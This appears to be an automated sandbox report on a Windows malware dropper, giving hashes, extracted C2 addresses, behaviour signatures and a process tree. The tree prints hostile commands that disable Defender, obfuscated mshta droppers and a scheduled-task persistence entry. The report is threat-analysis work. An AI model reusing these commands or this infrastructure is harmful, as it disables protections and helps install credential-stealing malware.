Analysis
-
max time kernel
39s -
max time network
151s -
platform
windows7_x64 -
resource
win7-en-20211104 -
submitted
19/11/2021, 18:12
Static task
static1
Behavioral task
behavioral1
Sample
ab0bd8932a92421272b5911e2ebf488b.exe
Resource
win7-en-20211104
General
-
Target
ab0bd8932a92421272b5911e2ebf488b.exe
-
Size
9.7MB
-
MD5
ab0bd8932a92421272b5911e2ebf488b
-
SHA1
8fc75411fae94208b303c30faf3f4ba7385f8e22
-
SHA256
61299f208e35ed6fa26b16639ff495d378f64f9486a70c29eae80592d930e791
-
SHA512
587d69b5016732170311cbfd85ca04c5b8127158e839e0155a6c225f3dd4e9a9f8a38b758316d557ceaf1b7c676c86f46250a5d3fd34c33681003cc41f1ddbc9
Malware Config
Extracted
socelars
http://www.gianninidesign.com/
Extracted
smokeloader
2020
http://membro.at/upload/
http://jeevanpunetha.com/upload/
http://misipu.cn/upload/
http://zavodooo.ru/upload/
http://targiko.ru/upload/
http://vues3d.com/upload/
Extracted
redline
media151
91.121.67.60:51630
Extracted
vidar
48.3
933
-
profile_id
933
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2228 2536 rundll32.exe 75 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2564 2536 rundll32.exe 75 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral1/memory/2272-241-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2272-242-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2272-243-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2272-244-0x0000000000418EFA-mapping.dmp family_redline behavioral1/memory/2272-246-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 1 IoCs
resource yara_rule behavioral1/files/0x000500000001306d-143.dat family_socelars -
Vidar Stealer 2 IoCs
resource yara_rule behavioral1/memory/1620-316-0x0000000000400000-0x00000000004D8000-memory.dmp family_vidar behavioral1/memory/1620-317-0x0000000001EC0000-0x0000000001F95000-memory.dmp family_vidar -
resource yara_rule behavioral1/files/0x000500000001262d-71.dat aspack_v212_v242 behavioral1/files/0x000500000001262d-72.dat aspack_v212_v242 behavioral1/files/0x0005000000012625-73.dat aspack_v212_v242 behavioral1/files/0x0005000000012625-74.dat aspack_v212_v242 behavioral1/files/0x000500000001264b-77.dat aspack_v212_v242 behavioral1/files/0x000500000001264b-78.dat aspack_v212_v242 -
Executes dropped EXE 19 IoCs
pid Process 364 setup_installer.exe 924 setup_install.exe 928 Mon135d1cd0566c227c.exe 1460 Mon133b4073df5e3f72.exe 888 Mon13459b4085.exe 1332 Mon1348816450.exe 1504 Mon13136643d24e51.exe 684 Mon13073304e5395.exe 752 Mon13470f9aa951f871.exe 1448 Mon134ab4d3e88a4d3e.exe 2004 Mon13470f9aa951f871.exe 1264 Mon13bb1ac8986b773.exe 1912 Mon13073304e5395.tmp 752 Mon13be6b39578.exe 1576 Mon13073304e5395.exe 240 Mon13073304e5395.tmp 2168 Mon13bb1ac8986b773.exe 2308 3SEL8GaJ5WrN1.EXe 2272 Mon13bb1ac8986b773.exe -
Loads dropped DLL 64 IoCs
pid Process 684 ab0bd8932a92421272b5911e2ebf488b.exe 364 setup_installer.exe 364 setup_installer.exe 364 setup_installer.exe 364 setup_installer.exe 364 setup_installer.exe 364 setup_installer.exe 924 setup_install.exe 924 setup_install.exe 924 setup_install.exe 924 setup_install.exe 924 setup_install.exe 924 setup_install.exe 924 setup_install.exe 924 setup_install.exe 976 cmd.exe 1376 cmd.exe 1752 cmd.exe 1460 Mon133b4073df5e3f72.exe 1460 Mon133b4073df5e3f72.exe 888 Mon13459b4085.exe 888 Mon13459b4085.exe 1740 cmd.exe 1012 cmd.exe 1976 cmd.exe 1504 Mon13136643d24e51.exe 1504 Mon13136643d24e51.exe 304 cmd.exe 304 cmd.exe 684 Mon13073304e5395.exe 684 Mon13073304e5395.exe 1720 cmd.exe 1720 cmd.exe 752 Mon13470f9aa951f871.exe 752 Mon13470f9aa951f871.exe 752 Mon13470f9aa951f871.exe 1448 Mon134ab4d3e88a4d3e.exe 1448 Mon134ab4d3e88a4d3e.exe 2004 Mon13470f9aa951f871.exe 2004 Mon13470f9aa951f871.exe 1244 cmd.exe 1244 cmd.exe 1264 Mon13bb1ac8986b773.exe 1264 Mon13bb1ac8986b773.exe 684 Mon13073304e5395.exe 912 cmd.exe 1912 Mon13073304e5395.tmp 1912 Mon13073304e5395.tmp 1912 Mon13073304e5395.tmp 1912 Mon13073304e5395.tmp 752 Mon13be6b39578.exe 752 Mon13be6b39578.exe 1576 Mon13073304e5395.exe 1576 Mon13073304e5395.exe 1576 Mon13073304e5395.exe 240 Mon13073304e5395.tmp 240 Mon13073304e5395.tmp 240 Mon13073304e5395.tmp 1264 Mon13bb1ac8986b773.exe 2116 WerFault.exe 2116 WerFault.exe 2116 WerFault.exe 1264 Mon13bb1ac8986b773.exe 2116 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 ip-api.com -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 752 set thread context of 2004 752 Mon13470f9aa951f871.exe 55 PID 1264 set thread context of 2272 1264 Mon13bb1ac8986b773.exe 69 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 2116 2004 WerFault.exe 55 2468 1620 WerFault.exe 93 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon134ab4d3e88a4d3e.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon134ab4d3e88a4d3e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon134ab4d3e88a4d3e.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2412 schtasks.exe -
Kills process with taskkill 2 IoCs
pid Process 2320 taskkill.exe 2640 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 49 IoCs
pid Process 752 Mon13be6b39578.exe 1448 Mon134ab4d3e88a4d3e.exe 1448 Mon134ab4d3e88a4d3e.exe 2116 WerFault.exe 2116 WerFault.exe 2116 WerFault.exe 2116 WerFault.exe 2116 WerFault.exe 2116 WerFault.exe 2116 WerFault.exe 1208 Process not Found 852 powershell.exe 1208 Process not Found 1724 powershell.exe 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1448 Mon134ab4d3e88a4d3e.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 888 Mon13459b4085.exe Token: SeDebugPrivilege 2116 WerFault.exe Token: SeDebugPrivilege 852 powershell.exe Token: SeDebugPrivilege 1724 powershell.exe Token: SeShutdownPrivilege 1208 Process not Found Token: SeDebugPrivilege 2320 taskkill.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1208 Process not Found 1208 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 684 wrote to memory of 364 684 ab0bd8932a92421272b5911e2ebf488b.exe 28 PID 684 wrote to memory of 364 684 ab0bd8932a92421272b5911e2ebf488b.exe 28 PID 684 wrote to memory of 364 684 ab0bd8932a92421272b5911e2ebf488b.exe 28 PID 684 wrote to memory of 364 684 ab0bd8932a92421272b5911e2ebf488b.exe 28 PID 684 wrote to memory of 364 684 ab0bd8932a92421272b5911e2ebf488b.exe 28 PID 684 wrote to memory of 364 684 ab0bd8932a92421272b5911e2ebf488b.exe 28 PID 684 wrote to memory of 364 684 ab0bd8932a92421272b5911e2ebf488b.exe 28 PID 364 wrote to memory of 924 364 setup_installer.exe 29 PID 364 wrote to memory of 924 364 setup_installer.exe 29 PID 364 wrote to memory of 924 364 setup_installer.exe 29 PID 364 wrote to memory of 924 364 setup_installer.exe 29 PID 364 wrote to memory of 924 364 setup_installer.exe 29 PID 364 wrote to memory of 924 364 setup_installer.exe 29 PID 364 wrote to memory of 924 364 setup_installer.exe 29 PID 924 wrote to memory of 1292 924 setup_install.exe 31 PID 924 wrote to memory of 1292 924 setup_install.exe 31 PID 924 wrote to memory of 1292 924 setup_install.exe 31 PID 924 wrote to memory of 1292 924 setup_install.exe 31 PID 924 wrote to memory of 1292 924 setup_install.exe 31 PID 924 wrote to memory of 1292 924 setup_install.exe 31 PID 924 wrote to memory of 1292 924 setup_install.exe 31 PID 924 wrote to memory of 1256 924 setup_install.exe 32 PID 924 wrote to memory of 1256 924 setup_install.exe 32 PID 924 wrote to memory of 1256 924 setup_install.exe 32 PID 924 wrote to memory of 1256 924 setup_install.exe 32 PID 924 wrote to memory of 1256 924 setup_install.exe 32 PID 924 wrote to memory of 1256 924 setup_install.exe 32 PID 924 wrote to memory of 1256 924 setup_install.exe 32 PID 924 wrote to memory of 1376 924 setup_install.exe 33 PID 924 wrote to memory of 1376 924 setup_install.exe 33 PID 924 wrote to memory of 1376 924 setup_install.exe 33 PID 924 wrote to memory of 1376 924 setup_install.exe 33 PID 924 wrote to memory of 1376 924 setup_install.exe 33 PID 924 wrote to memory of 1376 924 setup_install.exe 33 PID 924 wrote to memory of 1376 924 setup_install.exe 33 PID 924 wrote to memory of 976 924 setup_install.exe 34 PID 924 wrote to memory of 976 924 setup_install.exe 34 PID 924 wrote to memory of 976 924 setup_install.exe 34 PID 924 wrote to memory of 976 924 setup_install.exe 34 PID 924 wrote to memory of 976 924 setup_install.exe 34 PID 924 wrote to memory of 976 924 setup_install.exe 34 PID 924 wrote to memory of 976 924 setup_install.exe 34 PID 924 wrote to memory of 1864 924 setup_install.exe 35 PID 924 wrote to memory of 1864 924 setup_install.exe 35 PID 924 wrote to memory of 1864 924 setup_install.exe 35 PID 924 wrote to memory of 1864 924 setup_install.exe 35 PID 924 wrote to memory of 1864 924 setup_install.exe 35 PID 924 wrote to memory of 1864 924 setup_install.exe 35 PID 924 wrote to memory of 1864 924 setup_install.exe 35 PID 924 wrote to memory of 1740 924 setup_install.exe 36 PID 924 wrote to memory of 1740 924 setup_install.exe 36 PID 924 wrote to memory of 1740 924 setup_install.exe 36 PID 924 wrote to memory of 1740 924 setup_install.exe 36 PID 924 wrote to memory of 1740 924 setup_install.exe 36 PID 924 wrote to memory of 1740 924 setup_install.exe 36 PID 924 wrote to memory of 1740 924 setup_install.exe 36 PID 924 wrote to memory of 1752 924 setup_install.exe 37 PID 924 wrote to memory of 1752 924 setup_install.exe 37 PID 924 wrote to memory of 1752 924 setup_install.exe 37 PID 924 wrote to memory of 1752 924 setup_install.exe 37 PID 924 wrote to memory of 1752 924 setup_install.exe 37 PID 924 wrote to memory of 1752 924 setup_install.exe 37 PID 924 wrote to memory of 1752 924 setup_install.exe 37 PID 924 wrote to memory of 1012 924 setup_install.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe"C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:684 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:364 -
C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:924 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵PID:1292
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:1256
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon135d1cd0566c227c.exe4⤵
- Loads dropped DLL
PID:1376 -
C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon135d1cd0566c227c.exeMon135d1cd0566c227c.exe5⤵
- Executes dropped EXE
PID:928 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:2096
-
C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"7⤵PID:1556
-
C:\Users\Admin\AppData\Roaming\5592368.exe"C:\Users\Admin\AppData\Roaming\5592368.exe"8⤵PID:1292
-
-
C:\Users\Admin\AppData\Roaming\8164961.exe"C:\Users\Admin\AppData\Roaming\8164961.exe"8⤵PID:3000
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"9⤵PID:880
-
-
-
C:\Users\Admin\AppData\Roaming\5579078.exe"C:\Users\Admin\AppData\Roaming\5579078.exe"8⤵PID:992
-
-
C:\Users\Admin\AppData\Roaming\7804314.exe"C:\Users\Admin\AppData\Roaming\7804314.exe"8⤵PID:2920
-
C:\Users\Admin\AppData\Roaming\7935225.exe"C:\Users\Admin\AppData\Roaming\7935225.exe"9⤵PID:2236
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpT: cLosE( CREaTeOBJeCT( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Roaming\7935225.exe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF """" =="""" for %L In ( ""C:\Users\Admin\AppData\Roaming\7935225.exe"" ) do taskkill -IM ""%~NxL"" -F " , 0,trUE ) )10⤵PID:2908
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Roaming\7935225.exe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "" =="" for %L In ( "C:\Users\Admin\AppData\Roaming\7935225.exe" ) do taskkill -IM "%~NxL" -F11⤵PID:3068
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "7935225.exe" -F12⤵
- Kills process with taskkill
PID:2640
-
-
C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM12⤵PID:1992
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpT: cLosE( CREaTeOBJeCT( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF ""/PGeb9DQls~acXsvr9DzE3PVM "" =="""" for %L In ( ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ) do taskkill -IM ""%~NxL"" -F " , 0,trUE ) )13⤵PID:2760
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "/PGeb9DQls~acXsvr9DzE3PVM " =="" for %L In ( "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ) do taskkill -IM "%~NxL" -F14⤵PID:2768
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" Vbscript:CloSe ( cREATEobjeCT( "WScRipT.SHelL" ). rUN( "cMD.EXE /q /R eCHo | set /p = ""MZ"" > TiSQ.G& coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly &DEl /q *& stArT msiexec.exe -Y ..\VYGDVP.ly ", 0 , tRuE ))13⤵PID:2224
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R eCHo | set /p = "MZ" > TiSQ.G& coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly&DEl /q *&stArT msiexec.exe -Y ..\VYGDVP.ly14⤵PID:2764
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>TiSQ.G"15⤵PID:3040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "15⤵PID:2676
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -Y ..\VYGDVP.ly15⤵PID:2508
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\1992774.exe"C:\Users\Admin\AppData\Roaming\1992774.exe"9⤵PID:112
-
-
-
C:\Users\Admin\AppData\Roaming\6803894.exe"C:\Users\Admin\AppData\Roaming\6803894.exe"8⤵PID:1284
-
-
-
C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"7⤵PID:1620
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1620 -s 9688⤵
- Program crash
PID:2468
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵PID:560
-
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"7⤵PID:2528
-
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"7⤵PID:2404
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:1284
-
-
C:\Users\Admin\AppData\Local\Temp\zhangliang-game.exe"C:\Users\Admin\AppData\Local\Temp\zhangliang-game.exe"7⤵PID:2416
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵PID:2212
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"7⤵PID:2132
-
-
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"7⤵PID:2868
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵PID:1500
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵PID:2300
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:1488
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Creates scheduled task(s)
PID:2412
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:1612
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe10⤵PID:2804
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon133b4073df5e3f72.exe4⤵
- Loads dropped DLL
PID:976 -
C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exeMon133b4073df5e3f72.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1460 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScriPt: CLOSE ( cReatEObjECT("WscripT.SHell").run ( "C:\Windows\system32\cmd.exe /Q /C tyPe ""C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe"" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF """" =="""" for %Z IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe"") do taskkill /f -im ""%~nXZ"" " , 0, TRUE ) )6⤵PID:2040
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /C tyPe "C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9&iF "" =="" for %Z IN ( "C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe") do taskkill /f -im "%~nXZ"7⤵PID:2208
-
C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL98⤵
- Executes dropped EXE
PID:2308 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScriPt: CLOSE ( cReatEObjECT("WscripT.SHell").run ( "C:\Windows\system32\cmd.exe /Q /C tyPe ""C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe"" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF ""/PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9"" =="""" for %Z IN ( ""C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe"") do taskkill /f -im ""%~nXZ"" " , 0, TRUE ) )9⤵PID:2364
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /C tyPe "C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9&iF "/PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9" =="" for %Z IN ( "C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe") do taskkill /f -im "%~nXZ"10⤵PID:2504
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscript:ClOse( CReatEobJeCt ("wscrIPt.SHElL" ). RuN ( "C:\Windows\system32\cmd.exe /q/r EChO | sEt /P = ""MZ"" >XlaE8u7.Rq & cOPy /B /y XLaE8u7.rQ + UnS0AW.LjZ + M_Ko01.HO + GNPM.EM + VLcSO2Y.Z+ fQRB.5 pcAKEo.F & STart control.exe .\PcAKEO.F " ,0 ,TrUe ) )9⤵PID:2600
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q/r EChO | sEt /P = "MZ" >XlaE8u7.Rq &cOPy /B /y XLaE8u7.rQ + UnS0AW.LjZ+ M_Ko01.HO + GNPM.EM + VLcSO2Y.Z+ fQRB.5 pcAKEo.F & STart control.exe .\PcAKEO.F10⤵PID:2660
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "11⤵PID:2696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>XlaE8u7.Rq"11⤵PID:2708
-
-
C:\Windows\SysWOW64\control.execontrol.exe .\PcAKEO.F11⤵PID:2736
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\PcAKEO.F12⤵PID:2776
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\PcAKEO.F13⤵PID:3008
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\PcAKEO.F14⤵PID:3020
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -im "Mon133b4073df5e3f72.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2320
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13d453d994180b.exe4⤵PID:1864
-
C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13d453d994180b.exeMon13d453d994180b.exe5⤵PID:2820
-
C:\Users\Admin\AppData\Local\Temp\is-BL57H.tmp\Mon13d453d994180b.tmp"C:\Users\Admin\AppData\Local\Temp\is-BL57H.tmp\Mon13d453d994180b.tmp" /SL5="$301E0,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13d453d994180b.exe"6⤵PID:2912
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1348816450.exe4⤵
- Loads dropped DLL
PID:1740 -
C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon1348816450.exeMon1348816450.exe5⤵
- Executes dropped EXE
PID:1332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13459b4085.exe4⤵
- Loads dropped DLL
PID:1752 -
C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exeMon13459b4085.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:888
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13136643d24e51.exe4⤵
- Loads dropped DLL
PID:1012 -
C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13136643d24e51.exeMon13136643d24e51.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1504
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13073304e5395.exe4⤵
- Loads dropped DLL
PID:1976 -
C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exeMon13073304e5395.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:684 -
C:\Users\Admin\AppData\Local\Temp\is-G9424.tmp\Mon13073304e5395.tmp"C:\Users\Admin\AppData\Local\Temp\is-G9424.tmp\Mon13073304e5395.tmp" /SL5="$10186,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1912 -
C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe"C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe" /SILENT7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1576 -
C:\Users\Admin\AppData\Local\Temp\is-4OFVO.tmp\Mon13073304e5395.tmp"C:\Users\Admin\AppData\Local\Temp\is-4OFVO.tmp\Mon13073304e5395.tmp" /SL5="$20186,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:240
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13a2838ed1d8384.exe4⤵PID:1312
-
-
